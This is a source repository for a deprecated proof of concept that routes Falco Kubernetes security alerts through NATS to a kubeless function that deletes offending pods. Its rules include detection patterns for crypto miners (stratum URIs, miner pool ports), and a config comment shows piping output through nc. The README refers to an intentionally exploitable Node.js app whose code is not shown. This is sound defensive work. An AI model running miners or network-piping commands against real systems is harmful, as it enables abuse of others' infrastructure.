├── LICENSE
├── README.MD
├── falco-account.yaml
├── falco-config
│   ├── falco.yaml
│   ├── falco_rules.local.yaml
│   └── falco_rules.yaml
├── falco-daemonset-configmap.yaml
├── falco-nats
│   ├── Dockerfile
│   ├── Makefile
│   ├── nats-pub
│   └── nats-pub.go
├── kubeless-function
│   ├── README.md
│   ├── delete-pod.py
│   ├── falco-pod-delete-account.yaml
│   ├── kubeless-cm.yaml
│   └── requirements.txt
├── nats-cluster-via-CRD.yaml
├── nodejs-app
│   ├── README.md
│   ├── node-exploit
│   │   ├── Dockerfile
│   │   ├── package.json
│   │   └── server.js
│   ├── nodejs-app.yml
│   └── nodejspayload.py
└── read.sh
/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files.
29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 
61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # THIS REPO IS DEPRECATED IN FAVOR OF THE [OFFICIAL EXAMPLE](https://github.com/falcosecurity/falco/tree/dev/integrations/kubernetes-response-engine) 2 | 3 | # Active Kubernetes Security with Falco, NATS, & kubeless 4 | 5 | This is a proof of concept that uses a Go NATS client to take alerts from Sysdig Falco and publish them to a NATS messaging server. Falco detects abnormal behavior in the Kubernetes cluster in which it runs, then sends an alert to the NATS client, which forwards the alert to the NATS server. Subscribers can then subscribe to the subject `FALCO` on the NATS server to see Falco alerts and take action on them. A kubeless function is provided as an example that deletes a Pod when a `CRITICAL` Falco alert is received. Multiple subscribers can take action on the same alert; for instance, one archiving the alert and another deleting the offending Pod.
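The end-to-end flow — Falco writes one JSON alert per line, and the client reads each line from a named pipe and publishes it to the `FALCO` subject — can be sketched as below. This is an illustrative Python stand-in for the repo's Go `nats-pub` client, not the actual implementation; the `pump_alerts` name and the `publish` callback are invented for the sketch.

```python
def pump_alerts(pipe_path, publish):
    """Read newline-delimited Falco alerts from pipe_path and hand each
    non-empty line to publish(subject, alert_json).

    In this repo the equivalent loop lives in the Go nats-pub client,
    where publish is a NATS publish to the FALCO subject; here it is a
    plain callback so the sketch stays self-contained.
    """
    # Opening a FIFO for reading blocks until a writer (Falco) opens it;
    # with keep_alive: true, Falco holds the pipe open and writes one
    # JSON alert per line.
    with open(pipe_path) as pipe:
        for line in pipe:
            line = line.strip()
            if line:
                publish("FALCO", line)
```

Because the function only takes a path, it behaves the same on a regular file, which makes the loop easy to exercise without creating a FIFO.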
6 | 7 | ## falco-config 8 | 9 | This contains Falco rules and a Falco config file. The rules are the default rules for Falco. The configuration file has been modified from the original as follows. 10 | 11 | ``` 12 | json_output: true 13 | ``` 14 | 15 | This changes the default output format from log-style text to JSON. 16 | 17 | ``` 18 | # line. If keep_alive is set to false, the file will be re-opened 19 | # for each output message. 20 | # 21 | # Also, the file will be closed and reopened if falco is signaled with 22 | # SIGUSR1. 23 | 24 | file_output: 25 | enabled: true 26 | keep_alive: true 27 | filename: /var/run/falco/nats 28 | 29 | stdout_output: 30 | enabled: true 31 | 32 | ``` 33 | 34 | This enables sending Falco alerts to a file. Set `enabled` and `keep_alive` to `true`, and change the `filename` to the value shown. `keep_alive` is set to `true` because `/var/run/falco/nats` is actually a [named pipe](https://www.linuxjournal.com/article/2156) that the NATS client will read from. 35 | 36 | ## falco-nats 37 | 38 | This folder has a Go program that reads from the named pipe `/var/run/falco/nats` and publishes each Falco alert to the specified NATS server. Set your Docker org in the `Makefile`, then run `make` to build the Go program and a container image to run the client in. You'll need a [Go development environment](https://golang.org/doc/install) and the [Go NATS Client](https://github.com/nats-io/go-nats). 39 | 40 | The resulting `nats-pub` executable takes the following options. 41 | 42 | ``` 43 | -s The NATS server to connect to. Default: nats://nats:4222 44 | -f The named pipe to read from. Default: /var/run/falco/nats 45 | ``` 46 | 47 | For a NATS server that can be deployed to Kubernetes, we leveraged [the example](http://kubeless.io/docs/quick-start/) in the Kubeless quick start. 48 | 49 | ## falco-daemonset-configmap.yaml 50 | 51 | This deploys Falco and the falco-nats container as a Kubernetes daemonset.
It also deploys an [Init Container](https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) that creates a Linux named pipe on a shared volume. This volume is shared between the Falco container and the NATS client, and the named pipe is used to pass the Falco alerts between the two containers. This daemon set has the following changes from the [published version](https://github.com/draios/falco/tree/dev/examples/k8s-using-daemonset) for Falco. 52 | 53 | ``` 54 | spec: 55 | serviceAccount: falco-account 56 | containers: 57 | - name: falco-nats 58 | image: sysdiglabs/falco-nats:latest 59 | imagePullPolicy: Always 60 | volumeMounts: 61 | - mountPath: /var/run/falco/ 62 | name: shared-pipe 63 | - name: falco 64 | image: sysdig/falco:latest 65 | ``` 66 | 67 | Added the container for the NATS client. 68 | 69 | ``` 70 | args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes", "-pk", "-U"] 71 | volumeMounts: 72 | - mountPath: /var/run/falco/ 73 | name: shared-pipe 74 | readOnly: false 75 | - mountPath: /host/var/run/docker.sock 76 | ``` 77 | Added a `volumeMount` for our shared named pipe to the `falco` container. 78 | 79 | ``` 80 | name: falco-config 81 | initContainers: 82 | - name: init-pipe 83 | image: busybox 84 | command: ['mkfifo','/var/run/falco/nats'] 85 | volumeMounts: 86 | - mountPath: /var/run/falco/ 87 | name: shared-pipe 88 | readOnly: false 89 | volumes: 90 | - name: shared-pipe 91 | emptyDir: {} 92 | - name: docker-socket 93 | ``` 94 | Added an Init Container to create the named pipe. This helps us ensure the pipe is available for either container, as the Init Container must finish before either application container starts. 95 | 96 | To deploy the DaemonSet, run the below. 
97 | 98 | ``` 99 | falco-nats$ kubectl create configmap falco-config --from-file=falco-config/ 100 | configmap "falco-config" created 101 | falco-nats$ kubectl create -f falco-account.yaml 102 | serviceaccount "falco-account" created 103 | clusterrole "falco-cluster-role" created 104 | clusterrolebinding "falco-cluster-role-binding" created 105 | falco-nats$ kubectl create -f falco-daemonset-configmap.yaml 106 | daemonset "falco" created 107 | ``` 108 | 109 | The daemonset can be verified by tailing the `falco-nats` container logs in one terminal and shelling into the `falco` container in another. This should trigger an alert that a shell was opened in a container. 110 | 111 | ``` 112 | # terminal 1 113 | falco-nats$ kubectl logs -f falco-75r25 falco-nats 114 | Opened pipe /var/run/falco/nats 115 | Scanning /var/run/falco/ 116 | Published [FALCO] : '{"output":"16:57:40.936641184: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-b5hk7 container=7f25ca3dfdd1 shell=bash parent= cmdline=bash terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2018-04-19T16:57:40.936641184Z", "output_fields": {"container.id":"7f25ca3dfdd1","evt.time":1524157060936641184,"k8s.pod.name":"falco-b5hk7","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}' 117 | 118 | 119 | # terminal 2 120 | falco-nats$ kubectl exec -it falco-75r25 -c falco -- bash 121 | ``` 122 | 123 | ## nodejs-app 124 | 125 | This is an application that can be exploited via unsanitized data in a cookie. See the [README.md](nodejs-app/README.md) in the `nodejs-app` folder for more details. 126 | 127 | ## kubeless-function 128 | 129 | This is a kubeless function that subscribes to the `FALCO` subject on the NATS server and fires when an alert is received. See the [README.md](kubeless-function/README.md) for more details.
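The core decision a subscriber like the kubeless function makes — act only on `CRITICAL` alerts, and pull the offending pod's name out of the alert's `output_fields` — can be sketched as below. This is a hedged illustration, not the repo's actual `delete-pod.py`; the `handle_alert` name and the `delete_pod` callback are invented, and the alert shape matches the JSON emitted by Falco's `json_output` as shown in the logs above.

```python
import json

def handle_alert(raw_alert, delete_pod):
    """Given one Falco alert (a JSON string received on the FALCO
    subject), delete the offending pod only for CRITICAL alerts.

    delete_pod stands in for a Kubernetes API call. Returns the pod
    name that was acted on, or None if no action was taken.
    """
    alert = json.loads(raw_alert)
    # Compare case-insensitively: rules declare "CRITICAL" while the
    # emitted JSON may render the priority as "Critical".
    if alert.get("priority", "").upper() != "CRITICAL":
        return None
    pod = alert.get("output_fields", {}).get("k8s.pod.name")
    if pod:
        delete_pod(pod)
    return pod
```

Because the handler is a pure function of the alert plus a callback, several subscribers can share the same parsing logic while taking different actions (archiving, deleting, paging).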
130 | -------------------------------------------------------------------------------- /falco-account.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: falco-account 5 | --- 6 | kind: ClusterRole 7 | apiVersion: rbac.authorization.k8s.io/v1beta1 8 | metadata: 9 | name: falco-cluster-role 10 | rules: 11 | - apiGroups: ["extensions",""] 12 | resources: ["nodes","namespaces","pods","replicationcontrollers","services","events","configmaps"] 13 | verbs: ["get","list","watch"] 14 | - nonResourceURLs: ["/healthz", "/healthz/*"] 15 | verbs: ["get"] 16 | --- 17 | kind: ClusterRoleBinding 18 | apiVersion: rbac.authorization.k8s.io/v1beta1 19 | metadata: 20 | name: falco-cluster-role-binding 21 | namespace: default 22 | subjects: 23 | - kind: ServiceAccount 24 | name: falco-account 25 | namespace: default 26 | roleRef: 27 | kind: ClusterRole 28 | name: falco-cluster-role 29 | apiGroup: rbac.authorization.k8s.io 30 | -------------------------------------------------------------------------------- /falco-config/falco.yaml: -------------------------------------------------------------------------------- 1 | # File(s) or Directories containing Falco rules, loaded at startup. 2 | # The name "rules_file" is only for backwards compatibility. 3 | # If the entry is a file, it will be read directly. If the entry is a directory, 4 | # every file in that directory will be read, in alphabetical order. 5 | # 6 | # falco_rules.yaml ships with the falco package and is overridden with 7 | # every new software version. falco_rules.local.yaml is only created 8 | # if it doesn't exist. If you want to customize the set of rules, add 9 | # your customizations to falco_rules.local.yaml. 10 | # 11 | # The files will be read in the order presented here, so make sure if 12 | # you have overrides they appear in later files. 
13 | rules_file: 14 | - /etc/falco/falco_rules.yaml 15 | - /etc/falco/falco_rules.local.yaml 16 | - /etc/falco/rules.d 17 | 18 | # Whether to output events in json or text 19 | json_output: true 20 | 21 | # When using json output, whether or not to include the "output" property 22 | # itself (e.g. "File below a known binary directory opened for writing 23 | # (user=root ....") in the json output. 24 | json_include_output_property: true 25 | 26 | # Send information logs to stderr and/or syslog Note these are *not* security 27 | # notification logs! These are just Falco lifecycle (and possibly error) logs. 28 | log_stderr: true 29 | log_syslog: true 30 | 31 | # Minimum log level to include in logs. Note: these levels are 32 | # separate from the priority field of rules. This refers only to the 33 | # log level of falco's internal logging. Can be one of "emergency", 34 | # "alert", "critical", "error", "warning", "notice", "info", "debug". 35 | log_level: info 36 | 37 | # Minimum rule priority level to load and run. All rules having a 38 | # priority more severe than this level will be loaded/run. Can be one 39 | # of "emergency", "alert", "critical", "error", "warning", "notice", 40 | # "info", "debug". 41 | priority: debug 42 | 43 | # Whether or not output to any of the output channels below is 44 | # buffered. Defaults to true 45 | buffered_outputs: true 46 | 47 | # A throttling mechanism implemented as a token bucket limits the 48 | # rate of falco notifications. This throttling is controlled by the following configuration 49 | # options: 50 | # - rate: the number of tokens (i.e. right to send a notification) 51 | # gained per second. Defaults to 1. 52 | # - max_burst: the maximum number of tokens outstanding. Defaults to 1000. 53 | # 54 | # With these defaults, falco could send up to 1000 notifications after 55 | # an initial quiet period, and then up to 1 notification per second 56 | # afterward. 
It would gain the full burst back after 1000 seconds of 57 | # no activity. 58 | 59 | outputs: 60 | rate: 1 61 | max_burst: 1000 62 | 63 | # Where security notifications should go. 64 | # Multiple outputs can be enabled. 65 | 66 | syslog_output: 67 | enabled: true 68 | 69 | # If keep_alive is set to true, the file will be opened once and 70 | # continuously written to, with each output message on its own 71 | # line. If keep_alive is set to false, the file will be re-opened 72 | # for each output message. 73 | # 74 | # Also, the file will be closed and reopened if falco is signaled with 75 | # SIGUSR1. 76 | 77 | file_output: 78 | enabled: true 79 | keep_alive: true 80 | filename: /var/run/falco/nats 81 | 82 | stdout_output: 83 | enabled: true 84 | 85 | # Possible additional things you might want to do with program output: 86 | # - send to a slack webhook: 87 | # program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX" 88 | # - logging (alternate method than syslog): 89 | # program: logger -t falco-test 90 | # - send over a network connection: 91 | # program: nc host.example.com 80 92 | 93 | # If keep_alive is set to true, the program will be started once and 94 | # continuously written to, with each output message on its own 95 | # line. If keep_alive is set to false, the program will be re-spawned 96 | # for each output message. 97 | # 98 | # Also, the program will be closed and reopened if falco is signaled with 99 | # SIGUSR1. 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /falco-config/falco_rules.local.yaml: -------------------------------------------------------------------------------- 1 | #################### 2 | # Your custom rules! 
3 | #################### 4 | 5 | # Add new rules, like this one 6 | # - rule: The program "sudo" is run in a container 7 | # desc: An event will trigger every time you run sudo in a container 8 | # condition: evt.type = execve and evt.dir=< and container.id != host and proc.name = sudo 9 | # output: "Sudo run in container (user=%user.name %container.info parent=%proc.pname cmdline=%proc.cmdline)" 10 | # priority: ERROR 11 | # tags: [users, container] 12 | 13 | # Or override/append to any rule, macro, or list from the Default Rules 14 | 15 | - macro: node_app_frontend 16 | condition: k8s.ns.name = node-app and k8s.pod.label.role = frontend and k8s.pod.label.app = node-app 17 | 18 | - rule: Detect crypto miners using the Stratum protocol 19 | desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp' 20 | condition: node_app_frontend and spawned_process and container.id != host and proc.cmdline contains stratum+tcp 21 | output: Possible miner ran inside a container (command=%proc.cmdline %container.info) 22 | priority: CRITICAL 23 | 24 | - list: miner_ports 25 | items: [ 26 | 3333, 4444, 8333, 7777, 7778, 3357, 27 | 3335, 8899, 8888, 5730, 5588, 8118, 28 | 6099, 9332, 1 29 | ] 30 | 31 | - macro: miner_port_connection 32 | condition: fd.sport in (miner_ports) 33 | 34 | - rule: Detect outbound connections to common miner pool ports 35 | desc: Miners typically connect to miner pools on common ports. 36 | condition: node_app_frontend and outbound and miner_port_connection 37 | output: "Outbound connection to common miner port (command=%proc.cmdline port=%fd.rport %container.info)" 38 | priority: CRITICAL -------------------------------------------------------------------------------- /falco-config/falco_rules.yaml: -------------------------------------------------------------------------------- 1 | # Currently disabled as read/write are ignored syscalls. 
The nearly 2 | # similar open_write/open_read check for files being opened for 3 | # reading/writing. 4 | # - macro: write 5 | # condition: (syscall.type=write and fd.type in (file, directory)) 6 | # - macro: read 7 | # condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory)) 8 | 9 | - macro: open_write 10 | condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0 11 | 12 | - macro: open_read 13 | condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0 14 | 15 | - macro: never_true 16 | condition: (evt.num=0) 17 | 18 | # In some cases, such as dropped system call events, information about 19 | # the process name may be missing. For some rules that really depend 20 | # on the identity of the process performing an action such as opening 21 | # a file, etc., we require that the process name be known. 22 | - macro: proc_name_exists 23 | condition: (proc.name!="") 24 | 25 | - macro: rename 26 | condition: evt.type in (rename, renameat) 27 | - macro: mkdir 28 | condition: evt.type = mkdir 29 | - macro: remove 30 | condition: evt.type in (rmdir, unlink, unlinkat) 31 | 32 | - macro: modify 33 | condition: rename or remove 34 | 35 | - macro: spawned_process 36 | condition: evt.type = execve and evt.dir=< 37 | 38 | # File categories 39 | - macro: bin_dir 40 | condition: fd.directory in (/bin, /sbin, /usr/bin, /usr/sbin) 41 | 42 | - macro: bin_dir_resolved 43 | condition: > 44 | (evt.abspath startswith /bin/ or 45 | evt.abspath startswith /sbin/ or 46 | evt.abspath startswith /usr/bin/ or 47 | evt.abspath startswith /usr/sbin/) 48 | 49 | - macro: bin_dir_mkdir 50 | condition: > 51 | (evt.arg[1] startswith /bin/ or 52 | evt.arg[1] startswith /sbin/ or 53 | evt.arg[1] startswith /usr/bin/ or 54 | evt.arg[1] startswith /usr/sbin/) 55 | 56 | - macro: bin_dir_rename 57 | condition: > 58 | evt.arg[1] startswith /bin/ or 59 | evt.arg[1] startswith /sbin/ or 60 | 
evt.arg[1] startswith /usr/bin/ or 61 | evt.arg[1] startswith /usr/sbin/ 62 | 63 | - macro: etc_dir 64 | condition: fd.name startswith /etc/ 65 | 66 | # This detects writes immediately below / or any write anywhere below /root 67 | - macro: root_dir 68 | condition: ((fd.directory=/ or fd.name startswith /root) and fd.name contains "/") 69 | 70 | - list: shell_binaries 71 | items: [bash, csh, ksh, sh, tcsh, zsh, dash] 72 | 73 | - list: shell_mgmt_binaries 74 | items: [add-shell, remove-shell] 75 | 76 | - macro: shell_procs 77 | condition: (proc.name in (shell_binaries)) 78 | 79 | - list: coreutils_binaries 80 | items: [ 81 | truncate, sha1sum, numfmt, fmt, fold, uniq, cut, who, 82 | groups, csplit, sort, expand, printf, printenv, unlink, tee, chcon, stat, 83 | basename, split, nice, "yes", whoami, sha224sum, hostid, users, stdbuf, 84 | base64, unexpand, cksum, od, paste, nproc, pathchk, sha256sum, wc, test, 85 | comm, arch, du, factor, sha512sum, md5sum, tr, runcon, env, dirname, 86 | tsort, join, shuf, install, logname, pinky, nohup, expr, pr, tty, timeout, 87 | tail, "[", seq, sha384sum, nl, head, id, mkfifo, sum, dircolors, ptx, shred, 88 | tac, link, chroot, vdir, chown, touch, ls, dd, uname, "true", pwd, date, 89 | chgrp, chmod, mktemp, cat, mknod, sync, ln, "false", rm, mv, cp, echo, 90 | readlink, sleep, stty, mkdir, df, dir, rmdir, touch 91 | ] 92 | 93 | # dpkg -L login | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," 94 | - list: login_binaries 95 | items: [ 96 | login, systemd, '"(systemd)"', systemd-logind, su, 97 | nologin, faillog, lastlog, newgrp, sg 98 | ] 99 | 100 | # dpkg -L passwd | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," 101 | - list: passwd_binaries 102 | items: [ 103 | shadowconfig, grpck, pwunconv, grpconv, pwck, 104 | groupmod, vipw, pwconv, useradd, newusers, cppw, chpasswd, usermod, 105 | groupadd, groupdel, grpunconv, chgpasswd, userdel, 
chage, chsh, 106 | gpasswd, chfn, expiry, passwd, vigr, cpgr 107 | ] 108 | 109 | # repoquery -l shadow-utils | grep bin | xargs ls -ld | grep -v '^d' | 110 | # awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," 111 | - list: shadowutils_binaries 112 | items: [ 113 | chage, gpasswd, lastlog, newgrp, sg, adduser, deluser, chpasswd, 114 | groupadd, groupdel, addgroup, delgroup, groupmems, groupmod, grpck, grpconv, grpunconv, 115 | newusers, pwck, pwconv, pwunconv, useradd, userdel, usermod, vigr, vipw, unix_chkpwd 116 | ] 117 | 118 | - list: sysdigcloud_binaries 119 | items: [setup-backend, dragent, sdchecks] 120 | 121 | - list: docker_binaries 122 | items: [docker, dockerd, exe, docker-compose, docker-entrypoi, docker-runc-cur, docker-current] 123 | 124 | - list: k8s_binaries 125 | items: [hyperkube, skydns, kube2sky, exechealthz] 126 | 127 | - list: lxd_binaries 128 | items: [lxd, lxcfs] 129 | 130 | - list: http_server_binaries 131 | items: [nginx, httpd, httpd-foregroun, lighttpd, apache, apache2] 132 | 133 | - list: db_server_binaries 134 | items: [mysqld, postgres, sqlplus] 135 | 136 | - list: mysql_mgmt_binaries 137 | items: [mysql_install_d, mysql_ssl_rsa_s] 138 | 139 | - list: postgres_mgmt_binaries 140 | items: [pg_dumpall, pg_ctl, pg_lsclusters, pg_ctlcluster] 141 | 142 | - list: db_mgmt_binaries 143 | items: [mysql_mgmt_binaries, postgres_mgmt_binaries] 144 | 145 | - list: nosql_server_binaries 146 | items: [couchdb, memcached, redis-server, rabbitmq-server, mongod] 147 | 148 | - list: gitlab_binaries 149 | items: [gitlab-shell, gitlab-mon, gitlab-runner-b, git] 150 | 151 | - macro: server_procs 152 | condition: proc.name in (http_server_binaries, db_server_binaries, docker_binaries, sshd) 153 | 154 | # The explicit quotes are needed to avoid the - characters being 155 | # interpreted by the filter expression. 
- list: rpm_binaries
  items: [dnf, rpm, rpmkey, yum, '"75-system-updat"', rhsmcertd-worke, subscription-ma,
    repoquery, rpmkeys, rpmq, yum-cron, yum-config-mana, yum-debug-dump,
    abrt-action-sav, rpmdb_stat]

- macro: rpm_procs
  condition: proc.name in (rpm_binaries) or proc.name in (salt-minion)

- list: deb_binaries
  items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, apt, apt-get, aptitude,
    frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
    apt-listchanges, unattended-upgr, apt-add-reposit
    ]

# The truncated dpkg-preconfigu is intentional, process names are
# truncated at the sysdig level.
- list: package_mgmt_binaries
  items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, sane-utils.post]

- macro: package_mgmt_procs
  condition: proc.name in (package_mgmt_binaries)

- macro: run_by_package_mgmt_binaries
  condition: proc.aname in (package_mgmt_binaries, needrestart)

- list: ssl_mgmt_binaries
  items: [ca-certificates]

- list: dhcp_binaries
  items: [dhclient, dhclient-script]

# A canonical set of processes that run other programs with different
# privileges or as a different user.
- list: userexec_binaries
  items: [sudo, su, suexec]

- list: known_setuid_binaries
  items: [
    sshd, dbus-daemon-lau, ping, ping6, critical-stack-, pmmcli,
    filemng, PassengerAgent, bwrap, osdetect, nginxmng, sw-engine-fpm,
    start-stop-daem
    ]

- list: user_mgmt_binaries
  items: [login_binaries, passwd_binaries, shadowutils_binaries]

- list: dev_creation_binaries
  items: [blkid, rename_device, update_engine, sgdisk]

- list: hids_binaries
  items: [aide]

- list: vpn_binaries
  items: [openvpn]

- list: nomachine_binaries
  items: [nxexec, nxnode.bin, nxserver.bin, nxclient.bin]

- macro: system_procs
  condition: proc.name in (coreutils_binaries, user_mgmt_binaries)

- list: mail_binaries
  items: [
    sendmail, sendmail-msp, postfix, procmail, exim4,
    pickup, showq, mailq, dovecot, imap-login, imap,
    mailmng-core, pop3-login, dovecot-lda, pop3
    ]

